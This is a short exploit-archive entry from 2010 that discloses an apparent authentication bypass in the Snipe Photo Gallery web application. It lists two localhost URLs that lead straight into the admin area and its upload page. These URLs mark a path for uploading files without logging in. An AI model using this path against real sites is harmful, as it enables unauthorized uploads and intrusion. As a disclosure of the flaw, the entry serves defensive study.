id: 11533
date: 03/30/2010
title: Snipe Photo Gallery by Pass Remote Upload Vulnerability
author: indoushka
cves: 

=======================================================
Snipe Photo Gallery by Pass Remote Upload Vulnerability 
=======================================================

========================================================================================                 
| # Title    : Snipe Photo Gallery by Pass Remote Upload Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.dz-blackhat.com                                                                                                                                                                                                                  
| # Tested on: Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Remote Upload                                                            
======================      Exploit By indoushka       =================================
 # Exploit  :
  
     1- http://127.0.0.1/snipegallery/admin/index.php (Admin Aera)
      
     2- http://127.0.0.1/snipegallery/admin/index.php?action=add&cat_id=3 (Upload Page)



#  0day.today [2023-03-26]  #